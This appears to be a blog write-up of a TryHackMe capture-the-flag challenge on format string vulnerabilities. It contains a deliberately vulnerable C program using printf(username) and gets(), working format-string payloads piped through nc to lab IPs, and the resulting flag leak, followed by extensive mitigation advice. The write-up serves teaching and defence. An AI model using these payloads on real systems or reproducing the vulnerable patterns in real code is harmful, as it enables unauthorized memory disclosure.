August 25, 2025

Deep Dive into Format String Vulnerabilities: From Principles to Practical Exploitation

Flag: THM{format_issues}

Overview

A format string vulnerability is a classic memory-safety bug that arises when user input is passed to a printf-family function as the format argument. This article works through a practical case from the TryHackMe platform to analyze the attack principle, the memory mechanism, and the exploitation technique.

Format String Vulnerability Principle

Vulnerability Cause

The root cause of format string vulnerabilities lies in the design mechanism of the printf family functions:

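Parameter Count Mismatch: printf is variadic, so at run time it has no way to check how many arguments were actually passed. The compiler can compare specifiers against arguments only when the format is a string literal, not when it is user-controlled data.

Stack Memory Access: When the format string contains more specifiers than there are arguments, the function keeps fetching values from wherever the next arguments would be: leftover register contents and then adjacent stack memory.

Type Conversion Danger: Attackers choose the specifier, and with it how each fetched value is interpreted: %x and %p print it as a number, %s dereferences it as a pointer, and %n writes through it.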

Internal Mechanism of the printf Function

When printf(format, arg1, arg2, ...) is called, the format string is parsed character by character. Each time a % is encountered, the next value is fetched from the argument list according to the specifier that follows. printf does not know where the real arguments end, so if there are more specifiers than arguments it keeps reading from the locations where further arguments would have been.
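The parsing loop described above can be sketched with a toy formatter. This is not how any real libc implements printf; mini_format and append_str are hypothetical names, and only %d, %s, and %% are handled. The point it illustrates is that the specifier alone decides what is fetched next, and nothing in the loop knows how many arguments the caller supplied.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* Copy s into out starting at len, always leaving room for the terminator. */
static size_t append_str(char *out, size_t cap, size_t len, const char *s)
{
    while (*s != '\0' && len + 1 < cap) {
        out[len++] = *s++;
    }
    return len;
}

/* Hypothetical toy formatter supporting only %d, %s and %%. */
size_t mini_format(char *out, size_t cap, const char *fmt, ...)
{
    va_list ap;
    size_t len = 0;
    char num[32];

    if (cap == 0) {
        return 0;
    }
    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%') {
            char one[2] = { *p, '\0' };
            len = append_str(out, cap, len, one);
            continue;
        }
        p++;                       /* look at the conversion character */
        if (*p == '\0') {
            break;                 /* lone '%' at the end of the format */
        }
        if (*p == 'd') {
            /* The specifier alone decides that an int is fetched next. */
            snprintf(num, sizeof num, "%d", va_arg(ap, int));
            len = append_str(out, cap, len, num);
        } else if (*p == 's') {
            /* Likewise, the next value is trusted to be a valid char *. */
            len = append_str(out, cap, len, va_arg(ap, const char *));
        } else if (*p == '%') {
            len = append_str(out, cap, len, "%");
        }
    }
    va_end(ap);
    out[len] = '\0';
    return len;
}
```

Calling mini_format(buf, sizeof buf, "id=%d user=%s", 7, "bob") behaves as expected. Passing a format with more specifiers than arguments would make va_arg read values that were never supplied, which is undefined behavior and exactly the condition the attack relies on.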

Vulnerable Code Analysis

Let's delve into this vulnerable program:

c
#include <stdio.h>
#include <string.h>

void print_banner(){
    printf( "  ______ _          __      __         _ _   \n"
        " |  ____| |         \\ \\    / /        | | |  \n"
        " | |__  | | __ _  __ \\ \\  / /_ _ _   _| | |_ \n"
        " |  __| | |/ _` |/ _` \\ \\/ / _` | | | | | __|\n"
        " | |    | | (_| | (_| |\\  / (_| | |_| | | |_ \n"
        " |_|    |_|\\__,_|\\__, | \\/ \\__,_|\\__,_|_|\\__|\n"
        "                  __/ |                      \n"
        "                 |___/                       \n"
        "                                             \n"
        "Version 2.1 - Fixed print_flag to not print the flag. Nothing you can do about it!\n"
        "==================================================================\n\n"
          );
}

void print_flag(char *username){
        FILE *f = fopen("flag.txt","r");
        char flag[200];

        fgets(flag, 199, f);
        //printf("%s", flag);

    //The user needs to be mocked for thinking they could retrieve the flag
    printf("Hello, ");
    printf(username);  // 🚨 Vulnerability: User input is directly used as a format string
    printf(". Was version 2.0 too simple for you? Well I don't see no flags being shown now xD xD xD...\n\n");
    printf("Yours truly,\nByteReaper\n\n");
}

void login(){
    char username[100] = "";

    printf("Username: ");
    gets(username);  // 🚨 Buffer overflow risk: Input length is not checked

    // The flag isn't printed anymore. No need for authentication
    print_flag(username);
}

void main(){
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    // Start login process
    print_banner();
    login();

    return;
}

Key Vulnerability Analysis

1. Format String Vulnerability (printf(username) in print_flag)

c
printf(username);  // Dangerous! Should use printf("%s", username);

Problem Analysis:

The username variable is directly passed to printf as a format string. Attackers can include format specifiers (such as %x, %s, %p, etc.) in their input. These format specifiers will cause printf to read additional data from the stack.

2. Buffer Overflow Risk (gets(username) in login)

c
gets(username);  // Dangerous: no length limit; removed from the C standard in C11

Problem Analysis:

The gets() function does not check the input length, which can lead to buffer overflow. The username array is only 100 bytes, and overly long input will overwrite other data on the stack.

3. Flag Data Leakage Opportunity (start of print_flag)

c
FILE *f = fopen("flag.txt","r");
char flag[200];
fgets(flag, 199, f);

Key Point:

The flag is read into the local variable flag[200]. Although the printf call that would print it is commented out, the data is still in stack memory when printf(username) runs. It can therefore be reached indirectly through the format string vulnerability.

Memory Layout and Attack Mechanism

Stack Memory Layout Analysis

While print_flag is running, its stack frame looks roughly as follows on 32-bit x86. The exact order of the locals is compiler-dependent, and on x86-64 the username pointer arrives in a register rather than on the stack:

text
Stack Top (Low Address)
├─ FILE *f (fopen return value)
├─ char flag[200] (stores the read flag content)
├─ ...other local variables...
├─ Saved EBP
├─ Return Address
├─ char *username (passed parameter)
└─ login's stack frame (holds username[100]), then main's
Stack Bottom (High Address)

Stack Traversal Mechanism of Format String

When printf(username) is executed, if username is plain text, it will be output normally. In an attack scenario, if username contains format specifiers, printf will attempt to retrieve the corresponding parameters from the stack.

Parameter Position Calculation

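On 32-bit x86 (cdecl), every argument is passed on the stack: the first is the format string itself (username), and each further argument that a specifier asks for is simply the next 4-byte slot above it. On x86-64 (System V), the format string is passed in rdi, the next five integer or pointer arguments come from rsi, rdx, rcx, r8, and r9, and only the sixth and later arguments are read from the stack. In both cases the Nth argument is whatever value happens to sit in the corresponding register or stack slot.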
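To make the position arithmetic concrete, here is a small sketch that maps a positional index N (as in %N$p) to the place printf would fetch it from. It assumes the System V AMD64 calling convention and integer or pointer arguments only; the source does not state which architecture the challenge binary uses, and describe_arg_source is a hypothetical helper name.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * Describe where printf fetches positional argument n (as in %n$p) from,
 * assuming the System V AMD64 calling convention and integer/pointer
 * arguments only. The format string itself occupies rdi.
 * Stack offsets are relative to rsp at the call instruction.
 * Returns 0 on success, -1 for n == 0 or a too-small buffer.
 */
int describe_arg_source(unsigned n, char *out, size_t cap)
{
    static const char *const regs[] = { "rsi", "rdx", "rcx", "r8", "r9" };
    int written;

    if (n == 0) {
        return -1;
    }
    if (n <= 5) {
        written = snprintf(out, cap, "%s", regs[n - 1]);
    } else {
        /* Arguments 6 and up occupy consecutive 8-byte stack slots. */
        written = snprintf(out, cap, "[rsp+%u]", (n - 6) * 8u);
    }
    return (written < 0 || (size_t)written >= cap) ? -1 : 0;
}
```

Under this assumption, index 5 maps to r9 and index 6 to the first stack slot, so on a 64-bit target the first five positions show leftover register contents rather than stack memory.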

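Since the flag[200] array is on the stack, its bytes can be dumped word by word with %x or %p at the right offsets. If some argument slot instead holds a pointer to the array, a single %s at that position prints the whole flag.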

Attack Vector Analysis

Payload Analysis

Successful attack payload:

bash
echo -ne '%5$s' | nc 10.10.20.224 1337

Detailed Analysis:

%5$s tells printf to use its 5th argument. The N$ syntax (a POSIX extension that glibc supports) selects an argument by position, so the payload does not need four throwaway specifiers in front of it. The s conversion treats the value at that position as a string pointer and prints the bytes it points to, up to the first null byte.
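The positional syntax is a legitimate feature, which is easiest to see in a benign call. The sketch below assumes a libc that implements the POSIX N$ extension (glibc and musl do); swap_with_positions is a hypothetical helper name.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * Write "<second> <first>" into out by selecting arguments by position.
 * %2$s picks the second argument after the format, %1$s the first.
 * Returns the snprintf result (length of the full output).
 */
int swap_with_positions(char *out, size_t cap,
                        const char *first, const char *second)
{
    return snprintf(out, cap, "%2$s %1$s", first, second);
}
```

With first set to "hello" and second to "world", the buffer receives "world hello". The payload %5$s uses the same mechanism, except that no fifth argument was ever passed, so printf picks up whatever value occupies that position.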

Why the 5th Parameter?

By experimenting with different offsets:

bash
# Example command to probe stack content
echo -ne '%x %x %x %x %x %x %x %x %s' | nc 10.10.52.86 1337

After testing, it was found that the 1st-4th parameters are other data on the stack, the 5th parameter happens to point to the address of the flag string, and the 6th and subsequent parameters are other memory contents.

Impact of Memory Alignment

In real-world environments, the exact location of the flag on the stack may vary due to compiler optimization levels, stack alignment methods, system architecture (32-bit/64-bit), and the allocation of other local variables.

Therefore, it may be necessary to try different offsets (%4$s, %5$s, %6$s, etc.) to locate the flag.
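Trying offsets by hand gets tedious, so the probe strings can be generated. The following is a minimal sketch of such a generator; build_probe is a hypothetical helper, and sending the result to the target (for example through nc) is left out.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * Build a single positional probe such as "%5$p" into out.
 * index is the 1-based argument position; conv must be 'p', 's' or 'x'.
 * Returns 0 on success, -1 on invalid input or if out is too small.
 */
int build_probe(char *out, size_t cap, unsigned index, char conv)
{
    int written;

    if (index == 0 || (conv != 'p' && conv != 's' && conv != 'x')) {
        return -1;
    }
    /* "%%" emits a literal '%', then the index, a literal '$', and conv. */
    written = snprintf(out, cap, "%%%u$%c", index, conv);
    return (written < 0 || (size_t)written >= cap) ? -1 : 0;
}
```

A cautious workflow is to probe each index with 'p' first and switch to 's' only for values that look like valid pointers, because %s on an arbitrary value is likely to crash the target process.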

Practical Attack Demonstration

Complete Process of a Successful Attack

bash
$ echo -ne '%5$s' | nc 10.10.20.224 1337
  ______ _          __      __         _ _   
 |  ____| |         \ \    / /        | | |  
 | |__  | | __ _  __ \ \  / /_ _ _   _| | |_ 
 |  __| | |/ _` |/ _` \ \/ / _` | | | | | __|
 | |    | | (_| | (_| |\  / (_| | |_| | | |_ 
 |_|    |_|\__,_|\__, | \/ \__,_|\__,_|_|\__|
                  __/ |                      
                 |___/                       
                                             
Version 2.1 - Fixed print_flag to not print the flag. Nothing you can do about it!
==================================================================

Username: Hello, THM{format_issues}
. Was version 2.0 too simple for you? Well I don't see no flags being shown now xD xD xD...

Yours truly,
ByteReaper

Analysis of Successful Attack Principle

Input payload: %5$s

printf processing: When the program executes printf(username), the content of username is %5$s. printf parses the specifier %5$s, fetches its 5th argument, and treats it as a string pointer. In this binary that value happens to be the address of the flag string.

Output result: Successfully displays the flag content THM{format_issues}

Other probing payloads

Command for probing stack structure:

bash
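# Displays hexadecimal values of multiple stack locations
echo -ne '%x %x %x %x %x %x %x %x %s' | nc 10.10.52.86 1337

This payload displays the hexadecimal values of the first eight argument positions and finally uses %s to attempt to print the ninth as a string. If the ninth value is not a valid pointer, the %s dereference crashes the process, so it is safer to map the positions with %p first. Note also that %x prints only the low 32 bits of each value on a 64-bit target.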
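When flag bytes themselves show up in such a hex dump, each printed word has to be unpacked in memory order. Below is a minimal sketch assuming a little-endian target (x86 or x86-64); decode_leaked_word is a hypothetical helper, and the sample value in the usage note is constructed from the ASCII codes of "THM{", not taken from captured output.

```c
#include <stddef.h>

/*
 * Unpack one leaked word (as printed by %x or %p) into its bytes, lowest
 * byte first, which is memory order on little-endian x86/x86-64.
 * width is the word size in bytes (4 for %x, 8 for %p on a 64-bit target).
 * out must hold width + 1 bytes. Non-printable bytes are shown as '.'.
 */
void decode_leaked_word(unsigned long long word, size_t width, char *out)
{
    size_t i;

    for (i = 0; i < width && i < sizeof word; i++) {
        unsigned char byte = (unsigned char)(word >> (8 * i));
        out[i] = (byte >= 0x20 && byte < 0x7f) ? (char)byte : '.';
    }
    out[i] = '\0';
}
```

For example, a word printed as 7b4d4854 decodes to "THM{" because the lowest byte 0x54 ('T') comes first in memory. Repeating this over consecutive positions reassembles the string without ever needing a pointer to it.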

Key Elements of Vulnerability Exploitation

Format string vulnerability: printf(username) directly uses user input as the format string.

Sensitive data in memory: The flag is read into a local variable on the stack.

Predictable memory layout: The stack layout is relatively fixed in the same environment.

Direct position access: The %N$s syntax allows direct access to specific stack locations.

Protection Mechanisms and Security Recommendations

Code-Level Protection Measures

1. Safe printf Usage

c
// Dangerous way
printf(user_input);

// Safe way
printf("%s", user_input);
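The effect of the safe form can be checked directly: with a literal format, specifiers inside the user's text are copied as ordinary characters. The sketch below writes into a buffer with snprintf so the result can be inspected; render_greeting is a hypothetical helper, not part of the challenge source.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * Format a greeting with a literal format string. username is only ever
 * passed as an argument, so any '%' sequences in it are treated as data.
 * Returns the snprintf result (length of the full output).
 */
int render_greeting(char *out, size_t cap, const char *username)
{
    return snprintf(out, cap, "Hello, %s.", username);
}
```

Given the exploit payload %5$s as the username, the output is the literal text "Hello, %5$s." and no extra argument is read. When no formatting is needed at all, fputs(username, stdout) is another option, since fputs never interprets its input.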

2. Input Validation and Length Check

c
// Replace the dangerous gets() function
char username[100];
if (fgets(username, sizeof(username), stdin) != NULL) {
    // Remove possible newline character
    username[strcspn(username, "\n")] = '\0';
}
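One detail the snippet above leaves open is what happens to the rest of an over-long line: fgets stops when the buffer is full, and the remainder stays in the stream for the next read. A possible wrapper that also discards the excess is sketched here; read_line is a hypothetical name.

```c
#include <stdio.h>
#include <string.h>

/*
 * Read one line into buf (at most cap - 1 characters), strip the newline,
 * and discard any excess input up to the end of that line.
 * Returns 0 on success, -1 on EOF, read error, or cap == 0.
 */
int read_line(FILE *in, char *buf, size_t cap)
{
    size_t len;
    int ch;

    if (cap == 0 || fgets(buf, (int)cap, in) == NULL) {
        return -1;
    }
    len = strcspn(buf, "\n");
    if (buf[len] == '\n') {
        buf[len] = '\0';            /* the whole line fit */
    } else {
        /* The line was longer than the buffer: drop the remainder. */
        while ((ch = fgetc(in)) != EOF && ch != '\n') {
        }
    }
    return 0;
}
```

In login this would replace gets(username) with read_line(stdin, username, sizeof username), truncating long names instead of overflowing the buffer.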

3. Avoid Storing Sensitive Data on the Stack

c
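// Unsafe: Sensitive data on the stack
void print_flag(char *username) {
    char flag[200];  // On the stack, potentially leaked
    // ...
}

// Safer: keep the secret short-lived and wipe it before handling user input.
// Heap allocation alone does not help if a pointer to the buffer is still
// reachable from a register or the stack, because %s will follow it.
void print_flag(char *username) {
    char *flag = malloc(200);
    if (flag == NULL) {
        return;
    }
    // ... read and use the flag here ...
    // Zero out and free immediately after use. A plain memset before free
    // can be optimized away; prefer explicit_bzero or memset_s where available.
    memset(flag, 0, 200);
    free(flag);
}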
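Zeroing a buffer right before it goes out of use is a store the compiler is allowed to drop. Where explicit_bzero (glibc, BSD) or memset_s (C11 Annex K) is not available, a common fallback is to write through a volatile pointer. The sketch below shows that idiom; secure_wipe is a hypothetical name, and the idiom is widely used but not a formal guarantee of the C standard.

```c
#include <stddef.h>

/*
 * Zero n bytes starting at p. Writing through a volatile-qualified pointer
 * is intended to keep the compiler from eliding the stores as dead writes.
 */
void secure_wipe(void *p, size_t n)
{
    volatile unsigned char *bytes = (volatile unsigned char *)p;

    while (n-- > 0) {
        *bytes++ = 0;
    }
}
```

The wipe only helps if it runs before any code that handles untrusted input; clearing the flag after printf(username) has already executed would be too late.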

Compiler-Level Protection

1. Compiler Warnings

bash
# Enable format string related warnings
gcc -Wformat -Wformat-security -Wall source.c
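These warnings cover the standard printf family out of the box. Project-specific wrappers, such as a logging function that forwards to vsnprintf, are only checked if they are annotated. The sketch below uses the format attribute provided by GCC and Clang; format_message and the PRINTF_LIKE macro are hypothetical names.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* GCC and Clang: check calls against the format string like printf. */
#if defined(__GNUC__) || defined(__clang__)
#define PRINTF_LIKE(fmt_index, first_arg) \
    __attribute__((format(printf, fmt_index, first_arg)))
#else
#define PRINTF_LIKE(fmt_index, first_arg)
#endif

/* Parameter 3 is the format string; the variadic arguments start at 4. */
int format_message(char *out, size_t cap, const char *fmt, ...)
    PRINTF_LIKE(3, 4);

int format_message(char *out, size_t cap, const char *fmt, ...)
{
    va_list ap;
    int written;

    va_start(ap, fmt);
    written = vsnprintf(out, cap, fmt, ap);
    va_end(ap);
    return written;
}
```

With the attribute in place, a call such as format_message(buf, sizeof buf, user_input) is reported by -Wformat-security in the same way as printf(user_input).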

2. FORTIFY_SOURCE

bash
# Enable runtime checks (requires optimization; with glibc, level 2 also rejects %n in writable format strings)
gcc -D_FORTIFY_SOURCE=2 -O2 source.c

System-Level Protection

1. Address Space Layout Randomization (ASLR)

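Randomizes the memory addresses of the stack, heap, and libraries, making it difficult for attackers to predict the memory layout. It does not stop a leak like this one, where printf is handed a pointer that is already valid in the running process.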

2. Stack Protection (Stack Canary)

bash
# Enable stack protection
gcc -fstack-protector-all source.c

3. Non-executable Stack (NX bit)

Prevents code execution on the stack, reducing the risk of code injection attacks.

Modern Protection Techniques

1. Control Flow Integrity (CFI)

Detects and prevents control flow hijacking attacks.

2. Address Space Isolation

Uses containerization or sandboxing techniques to isolate applications.

3. Static Analysis Tools

Uses tools such as Clang Static Analyzer, Coverity, etc., to find potential vulnerabilities during development.

Secure Development Recommendations

1. Secure Programming Principles

Principle of least privilege: Programs only obtain the necessary permissions.

Input validation: Strictly validate all external inputs.

Defensive programming: Assume all inputs are malicious.

2. Code Review

Focus on string handling functions, check the use of format strings, and verify buffer boundary checks.

3. Security Testing

Fuzzing: Use tools such as AFL, libFuzzer.

Static analysis: Integrate into CI/CD pipelines.

Dynamic analysis: Use Valgrind, AddressSanitizer, etc.
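As an illustration of the fuzzing item, here is a minimal libFuzzer harness sketch. LLVMFuzzerTestOneInput is the entry point libFuzzer expects; render_hello is a hypothetical function under test, and the checked invariant (the name appears verbatim after the prefix) is an assumption chosen for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical function under test: formats a greeting with a literal format. */
static int render_hello(char *out, size_t cap, const char *name)
{
    return snprintf(out, cap, "Hello, %s", name);
}

/* libFuzzer entry point: called once for every generated input. */
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
    char name[128];
    char out[160];
    size_t n = size < sizeof name - 1 ? size : sizeof name - 1;

    if (n > 0) {
        memcpy(name, data, n);
    }
    name[n] = '\0';                 /* fuzz input is not NUL-terminated */

    /* Invariant: the name must appear verbatim after the 7-byte prefix. */
    if (render_hello(out, sizeof out, name) != (int)(7 + strlen(name)) ||
        strcmp(out + 7, name) != 0) {
        abort();                    /* libFuzzer records the failing input */
    }
    return 0;
}
```

With Clang this can be built using clang -g -fsanitize=fuzzer,address harness.c. If render_hello passed name as the format string instead, inputs containing % sequences would break the invariant or trip AddressSanitizer.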

Summary

Format string vulnerabilities, while a classic security vulnerability, still exist in modern software development. Through the analysis in this article, we can see:

Vulnerability principle: Inherent flaws in the design of printf family functions.

Attack methods: Utilizing stack memory layout and format specifiers.

Protective measures: Multi-layered security protection strategies.

Key lessons: never use user input directly as a format string; avoid keeping sensitive data in predictable memory locations longer than necessary; adopt multi-layered protection rather than relying on a single security mechanism; and conduct security code reviews and testing regularly.

This case reminds us again that we must pay extra attention to memory safety when writing C/C++ programs, especially when handling user input. Modern compilers and operating systems provide various protection mechanisms, but the security awareness and programming habits of developers remain the most important first line of defense.

Last updated: August 25, 2025
Deep Dive into Format String Vulnerabilities: From Principles to Practical Exploitation - ICTRUN